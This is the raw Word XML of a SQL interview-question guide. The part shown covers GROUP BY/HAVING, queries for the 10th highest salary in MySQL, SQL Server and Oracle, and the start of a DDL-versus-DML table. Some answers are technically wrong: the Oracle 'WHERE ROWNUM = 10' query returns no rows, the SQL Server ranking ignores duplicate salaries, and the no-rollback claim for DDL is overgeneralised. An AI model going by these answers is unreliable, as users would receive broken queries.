        <w:t>: Groups the customers by their city.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B63C20B"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COUNT(Customer_name)</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Counts the number of customers in each city.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D17F425"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HAVING COUNT(Customer_name) &gt; 1</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Filters the groups, returning only those cities where there is more than one customer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFDE23E" w14:textId="77777777" w:rsidR="0022085E" w:rsidRPr="0085313D" w:rsidRDefault="0022085E" w:rsidP="0085313D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This query will return the names of cities where there are more than one customer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616C5F6C" w14:textId="7D9B9D8A" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066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03C4F74">
          <v:rect id="_x0000_i3007" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4271048E" w14:textId="71C23C44" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="00766AAA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="727" w:name="_Toc196308207"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="006151B2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">uery </w:t>
      </w:r>
      <w:r w:rsidR="006151B2" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10th highest salary of employee</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="727"/>
    </w:p>
    <w:p w14:paraId="7DCAD287" w14:textId="6413A5A0" w:rsidR="006151B2" w:rsidRPr="005C1C9E" w:rsidRDefault="006151B2" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To find the 10th highest salary from the employee table, you can use the following SQL query. One way to achieve this is by using a subquery with DISTINCT and LIMIT (in databases like MySQL) or using ROW_NUMBER() in SQL Server or Oracle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FB6E3D" w14:textId="77777777" w:rsidR="006151B2" w:rsidRPr="005C1C9E" w:rsidRDefault="006151B2" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>For MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C11B44"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT MIN(emp_sal) AS 10th_highest_salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FB1E7"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>FROM (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3598DF95"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT DISTINCT emp_sal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C629DA"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM Employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0140580E"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    ORDER BY emp_sal DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7ECBFB"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    LIMIT 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47642D2F"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) AS temp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6926309C" w14:textId="77777777" w:rsidR="006151B2" w:rsidRPr="005C1C9E" w:rsidRDefault="006151B2" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7923D298"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DISTINCT emp_sal</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that the duplicate salary values are excluded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E531012"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ORDER BY emp_sal DESC</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Orders the salaries in descending order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039C7050"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LIMIT 10</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Limits the result to the top 10 salaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238D6496"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MIN(emp_sal)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since we are only looking for the 10th highest salary, MIN will give the lowest value from the top 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025898D3" w14:textId="77777777" w:rsidR="006151B2" w:rsidRPr="005C1C9E" w:rsidRDefault="006151B2" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>For SQL Server (using ROW_NUMBER()):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEB9153"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WITH SalaryRank AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3732D93F"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT emp_sal, ROW_NUMBER() OVER (ORDER BY emp_sal DESC) AS rank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C52A4B"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM Employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF44203"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57951A7F"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT emp_sal AS 10th_highest_salary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2656D4"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FROM SalaryRank</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDDAA93"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WHERE rank = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E5C603" w14:textId="77777777" w:rsidR="006151B2" w:rsidRPr="005C1C9E" w:rsidRDefault="006151B2" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>For Oracle (using ROWNUM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEA1742"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT emp_sal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018B4BB2"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>FROM (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E3A3EF"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT emp_sal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5314F179"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM Employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6580989B"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    ORDER BY emp_sal DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B507F"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFBD7F9"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WHERE ROWNUM = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4499625E" w14:textId="77777777" w:rsidR="006151B2" w:rsidRPr="005C1C9E" w:rsidRDefault="006151B2" w:rsidP="005C1C9E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>These queries will give you the 10th highest salary from the Employee table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAAD24E" w14:textId="584457A0" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066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8289762">
          <v:rect id="_x0000_i3008" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="202FF038" w14:textId="2FB35B05" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="006151B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="728" w:name="_Toc196308208"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00930C87" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between DDL and DML commands</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="728"/>
    </w:p>
    <w:p w14:paraId="5BBAB70D" w14:textId="0DA470A0" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Here’s a clear difference between </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DDL (Data Definition Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DML (Data Manipulation Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands in SQ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2"/>
        <w:gridCol w:w="4324"/>
        <w:gridCol w:w="4138"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="24444859" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="250D55F3" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BA71828" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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DDL (Data Definition Language)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="245677F2" w14:textId="77777777" w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w:rsidRDefault="00FB59DE"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DML (Data Manipulation Language)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="20DE2D88" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A98321B"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BC7235A"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Defines or modifies structure of database objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51A422F7"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Manages data within database objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="512AAF72" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06857F0B"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Affects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A678B28"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Schema/Structure (like tables, views)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01526649"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Table Data (insert, update, delete records)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="3FE5E79B" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D9999B4"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38AA8C45"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CREATE, ALTER, DROP, TRUNCATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01D412E7"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SELECT, INSERT, UPDATE, DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="543F0C9B" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71F30E48"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Transaction Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1477E35C"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Auto-committed (cannot be rolled back)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5659F5FF"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Can be rolled back or committed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="7542FA63" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11D36F67"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Usage Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="776574C4"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When you need to define or modify tables or schemas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A3D85CF"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When you need to manipulate records inside a table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB59DE" w:rsidRPr="005C1C9E" w14:paraId="2D750472" w14:textId="77777777" w:rsidTr="00FB59DE">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
